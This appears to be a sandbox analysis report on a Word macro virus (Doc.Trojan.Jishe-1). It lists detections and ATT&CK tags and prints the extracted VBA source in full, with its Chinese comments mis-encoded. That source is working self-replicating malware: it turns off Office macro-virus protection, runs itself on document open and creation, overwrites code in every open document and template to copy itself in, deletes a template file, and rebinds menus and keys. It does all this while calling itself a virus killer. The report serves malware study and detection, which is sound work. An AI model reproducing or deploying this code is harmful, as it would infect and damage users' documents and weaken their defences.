MALICIOUS
Risk Score: 196
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Document_Open, which are indicative of malicious intent. The macros appear to be designed to infect other documents and potentially download additional payloads, as suggested by the presence of strings like 'club@263.net' which could be used for C2 communication or payload retrieval. The ClamAV detection further supports the malicious classification.
Heuristics (6)
- ClamAV: Doc.Trojan.Jishe-1 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Trojan.Jishe-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
  Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION)
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: If LinesofCode > 0 Then xItem.CodeModule.DeleteLines 1, LinesofCode
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Document_Open macro (low, OLE_VBA_DOCOPEN)
  Document_Open macro
  Matched line in script: Private Sub Document_Open()
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46577 bytes |

SHA-256: 092270dd16cf10d5c8b1b57a100f8ad58c5c92d11ae54756295325b5fa670064
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ
'ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ
'¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦
'Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦
'»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż
'łĚĐňÉčĽĆ: Ľ˝É÷»Ş
'°ěą«µç»°:
'ŇÁĂõŘÖ·: club@263.net
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
Const answer0 = "FreeWordMacroVirusKiller" '±ŁłÖÓëŇÔǰ°ć±ľµÄĽćČÝĐÔ
Const answer1 = "MyMacroVirusKillerV1.0"
Const answer2 = "MyMacroVirusKillerV2.0" '±ľłĚĐň±ęÖľ
'Version 2.0
Private Sub Document_Open()
CloseVirusProtection
'Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
Attribute VB_Name = "JiShenhua"
'ŐâĘDZľČËѧϰÖĆ×÷µÄŇ»¸öşę˛ˇ¶ľ·ŔɱłĚĐň,ËüżÉŇÔ·ŔÖą˛ż·ÖWORDşę˛ˇ¶ľµÄ¸ĐČľ
'ŐâĐčŇŞÓĐ´óÁżµÄşę˛ˇ¶ľĚŘŐ÷Âë×÷ÎŞŇŔľÝ,ČçąűÄă·˘ĎÖÓбľŇßĂçÎŢÄÜÎŞÁ¦µÄşę˛ˇ¶ľ
'¸ĐĐ»ÄúĽ°Ę±ÓëÎŇÁŞĎµ,ÄăҲżÉŇÔ×ÔѡĐ޸ıľłĚĐň,ŇÔĽÓÇż±ľŇßĂçµÄą¦Á¦
'Ó벡¶ľ×÷¶·ŐůľÍČçͬµÖÓůÉç»á·¸×ď,ĐčŇŞ´óĽŇµÄą˛Í¬Ĺ¬Á¦
'»¶ÓĽÓČëĆäÖв˘łÉÎŞŇ»Ăűսʿ,ҲĐíÄăŐýĘÇ´óĽŇĆÚ´ýŇѾõÄÓÂĘż
'łĚĐňÉčĽĆ: Ľ˝É÷»Ş
'°ěą«µç»°:
'ŇÁĂõŘÖ·: club@263.net
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
Public pVirusReport As String '˛ˇ¶ľĂčĘöĐĹϢ
Private Const cMyID As String = "MyMacroVirusKillerV2.0" '±ľłĚĐň´úÂë±ęÖľ
Private Const cMyModule As String = "JiShenhua" '±ľłĚĐňµÄÄŁżéĂűłĆ
Private Const cMyUserForm As String = "VirusReport" '±ľłĚĐňµÄÓĂ»§´°żÚĂűłĆ
Private Const cOK As Integer = 0 'Ň»ÇĐŐýłŁ
Private Const cDocHasModuleElse As Integer = 1 'ÓĐĆäËűÄŁżé´ćÔÚ
Private Const cDocHasCodeElse As Integer = 2 'ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚ
Private Const cDocHasAllElse As Integer = 3 'ÔÚThisDocumentÄŁżéÖĐÓĐĆäËű´úÂë´ćÔÚŁ¬˛˘ÓĐĆäËűÄŁżé´ćÔÚ
Private Const cDocProtected As Integer = 4 '¸ĂÎĵµ±»±Ł»¤
'´ňżŞÎĵµĘ±×Ô¶ŻÖ´ĐĐ
Sub AutoOpen()
CloseVirusProtection
'Ľě˛é´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ,ČçąűÓвˇ¶ľŁ¬ĎňÓĂ»§Ěáłö±¨¸ć
If ScanVirus Then
Load VirusReport
VirusReport.Show
Else
InfectAll
End If
End Sub
'Đ½¨ÎĵµĘ±×Ô¶ŻÖ´ĐĐ
Sub AutoNew()
CloseVirusProtection
Infect Word.ActiveDocument
End Sub
'ąŘ±ŐWORD֮ǰÇĺŔíautoexec.dotÎÄĽţÖеIJˇ¶ľ
Sub AutoExit()
Const AutoDotFile = "C:\AUTOEXEC.DOT"
If Dir(AutoDotFile) <> "" Then
Kill AutoDotFile
End If
End Sub
'´ÓÖ¸¶¨ÎÄĽţÖĐĎňËůÓĐ´ňżŞÎĵµĽ°ÄٰĺÖи´ÖƱľłĚĐň´úÂ뼰ģżé
Public Function InfectAll() As Boolean
Dim myDoc As Document, myTemp As Template
'Ďň´ňżŞµÄÎĵµÖĐĐ´Č뱾´úÂë
For Each myDoc In Documents
Infect myDoc
Next myDoc
'ĎňWORDÄŁ°ĺÖĐĐ´Č뱾´úÂë
For Each myTemp In Templates
Infect myTemp
Next myTemp
InfectAll = True
End Function
'ÇĺłýËůÓĐ´ňżŞÎĵµĽ°ÄٰĺÖеIJˇ¶ľÄŁżéĽ°´úÂë
Public Function ClearVirus() As Boolean
Dim i As Integer
Dim myDoc As Document, myTemp As Template
Dim Cleared As Boolean
ClearVirus = True
'Ľě˛éËůÓĐÎĵµ˛˘Çĺłý
For Each myDoc In Documents
Cleared = ClearDocument(myDoc)
If Not Cleared Then
MsgBox "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ", vbOKOnly, myDoc.Name
ClearVirus = False
End If
Next myDoc
'Ľě˛éËůÓĐÄŁ°ĺ˛˘Çĺłý
For Each myTemp In Templates
Cleared = ClearDocument(myTemp)
If Not Cleared Then
MsgBox "˛ˇ¶ľÇĺłýą¤×÷˛»łÉą¦Ł¬ÇëĽě˛éÔŇňˇŁ", vbOKOnly, myTemp.Name
ClearVirus = False
End If
Next myTemp
End Function
'Ľě˛éËůÓĐ´ňżŞµÄÎĵµĽ°ÄٰĺÖĐĘÇ·ńÓвˇ¶ľ´ćÔÚŁ¬ČçąűÓĐŁ¬·µ»Ř˛ˇ¶ľĐĹϢĂčĘö×Ö·ű´®
Public Function ScanVirus() As Boolean
Dim DocsCount As Integer, i As Integer, ret As Integer
Dim myStr As String
Dim myDoc As Document, myTemp As Template
ScanVirus = False
pVirusReport = ""
'Ľě˛éËůÓĐ´ňżŞµÄÎĵµÖĐĘÇ·ńÓвˇ¶ľ
For Each myDoc In Documents
ret = ScanDocument(myDoc)
Select Case ret
Case cOK, cDocProtected
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ", vbOKOnly, "ϵͳłö´í"
End Select
Next myDoc
'Ľě˛éËůÓĐÄŁ°ĺ
For Each myTemp In Templates
ret = ScanDocument(myTemp)
Select Case ret
Case cOK, cDocProtected
Case cDocHasModuleElse, cDocHasCodeElse, cDocHasAllElse
ScanVirus = True
Case Else
MsgBox "şŻĘýScanDocument·µ»Ř´íÎó´úÂ룬ϵͳÎŢ·¨Ę¶±đˇŁ", vbOKOnly, "ϵͳłö´í"
End Select
Next myTemp
End Function
'ąŘ±ŐWordşę˛ˇ¶ľ±Ł»¤ą¦ÄÜ
Public Function CloseVirusProtection(Optional Protected As Boolean = False)
Options.VirusProtection = Protected
End Function
'°Ń±ľłĚĐň´úÂë´ÓŇ»¸öÎÄĽţ¸´ÖƵ˝ÁíŇ»¸öÎÄĽţÖĐ
Private Function Infect(TargetFile) As Boolean
Dim xItem, CommandStr As String, file As String
Dim myDoc As Document, myTemp As Template
Dim LinesofCode As Long, myStr As String
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
myStr = TypeName(TargetFile)
If myStr <> "Document" And myStr <> "Template" Then
MsgBox "ĘąÓĂĘýľÝŔŕĐÍ" + myStr + "µ÷ÓĂşŻĘýInfectŁ¬ĎµÍłÖ»ÔĘĐíĘąÓĂDocumentĽ°TemplateŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Infect = False
Exit Function
End If
Infect = True
If TargetFile.Name = ThisDocument.Name Then Exit Function 'Äż±ęÎÄĽţÓëÔ´ÎÄĽţĎŕͬʱ˛»Ö´ĐĐĐ´Čë˛Ů×÷
If Infected(TargetFile) Then Exit Function 'Äż±ęÎÄĽţŇŃľ´ćÔÚ±ľłĚĐň´úÂë
If TargetFile.VBProject.Protection Then Exit Function 'Äż±ęÎÄĽţ±»±Ł»¤Ł¬˛»ÄÜÖ´ĐĐĐ´Čë˛Ů×÷
Infect = False
'ÇĺłýÄż±ęÎĵµÖĐŇŃľ´ćÔÚµÄĆäËűÄŁżéĽ°´úÂë
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If LinesofCode > 0 Then xItem.CodeModule.DeleteLines 1, LinesofCode
Else
TargetFile.VBProject.VBComponents.Remove xItem
End If
Next xItem
'ĎňÎĵµÖĐĐ´Č뱾łĚĐň´úÂ뼰ģżé
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyModule, TargetFile.FullName + ":" + cMyModule
WordBasic.macrocopy ThisDocument.FullName + ":" + cMyUserForm, TargetFile.FullName + ":" + cMyUserForm
' ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^ ^o^
'¸ĂłĚĐň¶ÎČçąű·ĹÔÚǰÁ˝¸öÓďľäÖ®Ç°Ł¬ľÍ»áµĽÖÂVBA32.DLLłĚĐňłöĎÖÖÂĂü´íÎó¶řËŔ»ú٬
'ÇîÎŇÖ®±ĎÉú±ŕłĚľŃ飬˛»ÖŞşÎąĘŁ¬ĚěÄÄŁˇĚěŔíşÎÔÚŁż
LinesofCode = ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
myStr = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(1, LinesofCode)
TargetFile.VBProject.VBComponents(1).CodeModule.InsertLines 1, myStr
Infect = True
End Function
'Ľě˛éÖ¸¶¨ÎĵµÖĐĘÇ·ńŇŃľÓбľłĚĐň´úÂë
Private Function Infected(TargetFile)
Dim xItem, LinesofCode As Integer
Dim HasVirus As Integer
Dim myType As String
myType = TypeName(TargetFile)
If myType <> "Document" And myType <> "Template" Then
MsgBox "ĘąÓĂĘýľÝŔŕĐÍ" + myType + "µ÷ÓĂşŻĘýInfectedŁ¬ĎµÍłÖ»ÔĘĐíĘąÓĂDocumentĽ°TemplateŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Infected = True
Exit Function
End If
'Ľě˛éÄż±ęÎĵµĘÇ·ń±»±Ł»¤
If TargetFile.VBProject.Protection Then
Infected = True
Exit Function
End If
'µ±ThisDocument,myModule,myUserFormľů´ćÔÚƱ٬±íĘľ¸ĂÎÄĽţŇŃľ±»¸ĐČľ
HasVirus = 0
For Each xItem In TargetFile.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
HasVirus = HasVirus Or 1
End If
ElseIf xItem.Name = cMyModule Then
HasVirus = HasVirus Or 2
ElseIf xItem.Name = cMyUserForm Then
HasVirus = HasVirus Or 4
End If
Next xItem
If HasVirus = 7 Then
Infected = True
Else
Infected = False
End If
End Function
'Ľě˛éÖ¸¶¨µÄ´ňżŞÎĵµĽ°ÄٰĺÖĐĘÇ·ńÓвˇ¶ľ´ćÔÚ
Private Function ScanDocument(myDocOrTemp) As Integer
Dim xItem, i As Integer, myStr As String
Dim LinesofCode As Integer
ScanDocument = cOK
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "µ÷ÓĂşŻĘýScanDocumentÖ»ÄÜĘąÓĂDocumentĽ°TemplateĘýľÝŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Exit Function
End If
myStr = myDocOrTemp.Name + "Ľě˛é˝áąűŁş" + Chr(10)
'Ľě˛éłĚĐňÄŁżéĘÇ·ń±»±Ł»¤
If myDocOrTemp.VBProject.Protection Then
ScanDocument = cDocProtected
myStr = myStr + " ÎÄĽţÖеijĚĐň´úÂë±»±Ł»¤Ł¬ĎµÍłÎŢ·¨×Ô¶Ż˛éɱ٬µ«Ň˛żÉÄÜ´ćÔÚ˛ˇ¶ľŁ¬ÇëСĐÄŁˇ" + Chr(10)
Exit Function
End If
For Each xItem In myDocOrTemp.VBProject.VBComponents
If (xItem.Name = "ThisDocument") Then
'´Ë˛ż·ÖÓĐ´úÂëƱ٬ČçąűŐҲ»µ˝±ľÄŁżé±ęÖľÔňČ϶¨ÎŞ˛ˇ¶ľ
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (Not xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
ScanDocument = ScanDocument Or cDocHasCodeElse
myStr = myStr + " <" + xItem.Name + ">¶ÔĎóÖĐÓĐĆäËűłĚĐň´ćÔÚŁ¬´ó¸ĹĘDzˇ¶ľˇŁ" + Chr(10)
End If
ElseIf (xItem.Name <> cMyModule) And (xItem.Name <> cMyUserForm) Then
'ÎĵµÖĐłý±ľÄŁżé´úÂëÖ®Í⣬Čçąű»ąÓĐĆäËü´úÂëÔňČ϶¨ÎŞ˛ˇ¶ľ
ScanDocument = ScanDocument Or cDocHasModuleElse
myStr = myStr + " ÓĐĆäËűÄŁżé<" + xItem.Name + ">´ćÔÚŁ¬Ľ«ÓĐżÉÄÜĘDzˇ¶ľˇŁ" + Chr(10)
End If
Next
If ScanDocument = cOK Then myStr = myStr + " Ă»Óвˇ¶ľŁ¬Çë·ĹĐÄĘąÓáŁ" + Chr(10)
pVirusReport = pVirusReport + myStr
End Function
'ÇĺłýÖ¸¶¨µÄ´ňżŞÎĵµĽ°ÄٰĺÖеIJˇ¶ľÄŁżéĽ°´úÂë
Private Function ClearDocument(myDocOrTemp) As Boolean
Dim xItem, LinesofCode As Integer
ClearDocument = False
'Ľě˛é˛ÎĘýŔŕĐÍĘÇ·ńŐýČ·
If TypeName(myDocOrTemp) <> "Document" And TypeName(myDocOrTemp) <> "Template" Then
MsgBox "µ÷ÓĂşŻĘýClearDocumentÖ»ÄÜĘąÓĂDocumentĽ°TemplateĘýľÝŔŕĐ͡Ł", vbOKOnly, "ϵͳ´íÎó"
Exit Function
End If
If myDocOrTemp.VBProject.Protection Then
ClearDocument = True
Exit Function
End If
'Ľě˛éÎĵµĘÇ·ńÓвˇ¶ľ
If ScanDocument(myDocOrTemp) Then
For Each xItem In myDocOrTemp.VBProject.VBComponents
If xItem.Name = "ThisDocument" Then
LinesofCode = xItem.CodeModule.CountOfLines
If (LinesofCode > 0) And (Not xItem.CodeModule.Find(cMyID, 1, 1, 1 + LinesofCode, 1)) Then
xItem.CodeModule.DeleteLines 1, LinesofCode
End If
ElseIf xItem.Name <> cMyModule And xItem.Name <> cMyUserForm Then
myDocOrTemp.VBProject.VBComponents.Remove xItem
End If
Next
End If
ClearDocument = True
End Function
Attribute VB_Name = "VirusReport"
Attribute VB_Base = "0{DB93C28D-70D0-11D5-BD50-005056C31397}{DB93C274-70D0-11D5-BD50-005056C31397}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'´°ĚĺłĚĐň´úÂë
Option Explicit 'łĚĐňÖеıäÁż±ŘĐëĎȶ¨ŇĺşóĘąÓĂ
'´ňżŞ´°ĚĺʱִĐеIJŮ×÷
Private Sub UserForm_Initialize()
CheckBox1.Value = True
Information.Value = pVirusReport
Beep
End Sub
'ąŘ±Ő´°Ě壬˛»×÷Čκδ¦Ŕí
Private Sub CommandButtonNothing_Click()
Dim ret As Integer
ret = MsgBox("ÁěµĽŁ¬ËäČ»ÄăżÉÄÜ»áĹúĆŔÎŇŁ¬µ«»ąĘÇŇŞ¸ćËßÄ㣬ŐâŃů×öĘÇşÜÎŁĎյġŁĘÇ·ńŐćµÄ˛»×ö´¦ŔíŁ¬ÇëĹúĘľˇŁ", vbYesNo + vbDefaultButton2, "Ôٴα¨¸ćَ")
If ret = vbYes Then
Unload Me
End If
End Sub
'´ňżŞVisulBasic±ŕĽĆ÷
Private Sub CommandButtonOpenVisubasic_Click()
ShowVisualBasicEditor = True
End Sub
'ɱ˛ˇ¶ľ
Private Sub CommandButtonKill_Click()
If ClearVirus Then
ResetMenu
InfectAll
Unload Me
MsgBox "°´ŐŐÄúµÄÖ¸ĘľŁ¬ÎŇŇŃľ°ŃżÉÄÜĘDzˇ¶ľµÄ¶«¶«Č«˛żÇĺŔíÍę±Ď٬˛»ąýҲżÉÄÜşĂĐİěÁË»µĘÂŁ¬Äǿɲ»ŇŞąÖÎŇÓ´ˇŁ", vbOKOnly, "±¨¸ćَ"
Else
MsgBox "˛»ÖŞĘ˛Ă´ÔŇň٬Çĺłý˛ˇ¶ľą¤×÷˛»łÉą¦Ł¬ÇëÄúĘÖą¤Ľě˛é»ňÓëÎŇÁŞĎµˇŁ", vbOKOnly, "Ľ˝É÷»ŞĎňÄú±¨¸ćŁş"
Unload Me
End If
End Sub
'»Ö¸´±»˛ˇ¶ľ¸ü¸ÄµÄ˛ËµĄĎî
Private Function ResetMenu()
Dim mItem, cItem, myKey As KeyBinding
CustomizationContext = NormalTemplate
'Alt+F8:´ňżŞşę¶Ô»°żň
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
'Alt+F11:´ňżŞVisualBasic±ŕĽĆ÷
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
FindKey(BuildKeyCode(wdKeyAlt, wdKeyH)).Clear
FindKey(BuildKeyCode(wdKeyAlt, wdKeyK)).Clear
'»Ö¸´ą¤ľß˛ËµĄµÄÔĘĽÉčÖĂ
For Each mItem In CommandBars("Tools").Controls
mItem.Reset
Next mItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.Reset
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoProtection
End If
Next cItem
End Function